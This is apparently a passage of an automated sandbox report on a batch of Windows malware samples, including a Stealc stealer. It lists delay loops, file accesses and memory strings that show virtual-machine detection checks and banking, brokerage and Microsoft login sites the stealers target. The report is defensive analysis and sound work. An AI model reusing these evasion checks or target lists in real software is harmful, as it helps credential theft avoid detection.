Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 591797
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 591578
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 590807
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 590547
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 590234
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 589969
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 589750
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 589516
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 589265
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 589031
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 588687
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 588266
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 587953
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 587719
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 587422
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 587203
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 586937
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 586687
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 585922
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 585672
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 585406
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 585094
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 584812
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 584547
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 584266
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 584016
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 583750
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 583516
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 583266
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 583047
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 582812
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 582516
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 582297
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 582094
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 581781
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 581484
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 581172
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 580875
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 580641
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 580328
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 580141
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 579922
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 579715
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 579453
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 579234
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 578984
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 578766
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 578516
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 578312
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 578031
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 577828
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 577609
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 577375
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 577141
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 576913
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 576687
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 576484
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 576234
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 576000
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 575797
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 575547
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 575312
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 575093
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 574797
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 574594
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 574312
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 574078
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 573844
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 573547
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 572797
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 572547
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 572328
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 572141
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 571922
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 571672
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 571469
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 571203
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 570922
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 570109
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 569875
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 569625
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 569328
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 569094
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 568948
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 568774
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 568531
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 568328
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 568094
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 567344
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 567141
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 566955
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 566750
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 566531
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 566344
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 566156
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 565922
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 565703
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 565496
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 565291
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 564562
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 564342
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 564094
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 563844
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 563641
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 563500
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 563281
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 563047
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 562844
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 562680
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 562491
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 562281
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 562078
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 561844
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 561562
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 561391
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 561203
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 561016
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 560812
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 560623
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 560391
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 559687
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 559500
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 559312
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 559060
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 558828
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 558625
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 558451
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 558203
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 557982
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 557750
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 557047
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 556687
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 556481
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 556312
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 556139
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 555966
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 555777
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 555547
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 555297
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 555109
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 554906
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 554641
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 554078
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 553859
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 553625
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 553422
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 553234
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 553047
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 552859
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 552672
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 552468
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 552266
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 552047
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 551797
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Thread delayed: delay time: 551266
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user

Source: needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2232110837.0000000000401000.00000020.00000001.01000000.0000001C.sdmp	Binary or memory string: ParallelsVirtualMachine
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: 2.exe, 0000001E.00000000.2242679132.0000000000082000.00000002.00000001.01000000.0000001D.sdmp	Binary or memory string: CVmCi6"0
Source: svchost015.exe, 0000001D.00000002.2838666402.0000000027160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: needmoney.exe, 00000017.00000000.2150436324.0000000000401000.00000020.00000001.01000000.00000014.sdmp	Binary or memory string: QEMUU
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: axplong.exe, 00000009.00000002.3830428963.0000000000E26000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3830428963.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000016.00000002.3821765815.0000000001334000.00000004.00000020.00020000.00000000.sdmp, needmoney.exe, 00000017.00000003.2236719017.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, JavvvUmar.exe, 0000001C.00000003.2349709080.0000000001402000.00000004.00000020.00020000.00000000.sdmp, JavvvUmar.exe, 0000001C.00000003.3064049625.0000000001402000.00000004.00000020.00020000.00000000.sdmp, JavvvUmar.exe, 0000001C.00000003.3102244609.0000000001406000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2707762608.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2707762608.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: aspnet_regiis.exe, 00000020.00000002.3813346257.0000000000508000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: vmtoolsd.dll
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: penis.exe, 00000018.00000002.2227774761.0000000003270000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe@\
Source: aspnet_regiis.exe, 00000020.00000002.3818833176.000000000298D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Nework.exe, 00000013.00000003.2073761823.000000000086F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Hp
Source: penis.exe, 00000018.00000002.2227774761.0000000003270000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: svchost015.exe, 0000001D.00000002.2707762608.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: axplong.exe, axplong.exe, 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: splwow64.exe, 00000021.00000002.2296789752.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\'
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: Hkbsse.exe, 00000016.00000002.3821765815.0000000001304000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWl{%
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: svchost015.exe, 0000001D.00000002.2707762608.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwares
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: JavvvUmar.exe, 0000001C.00000003.3100964030.00000000013C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost015.exe, 0000001D.00000002.2838666402.0000000027160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: RegAsm.exe, 0000000C.00000002.2275749650.0000000005F92000.00000004.00000020.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2265293592.0000000000EF9000.00000004.00000020.00020000.00000000.sdmp, acentric.exe, 0000001B.00000002.3303214671.0000000008153000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: JavvvUmar.exe, 0000001C.00000003.2402136887.000000000D85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: stealc_default2.exe, 00000015.00000002.2318326891.00000000008B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWpQ
Source: aspnet_regiis.exe, 00000020.00000002.3813346257.0000000000508000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: cmdvrt32.dllvmtoolsd.dll
Source: u3uP67496d.exe, 00000012.00000002.2272318909.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
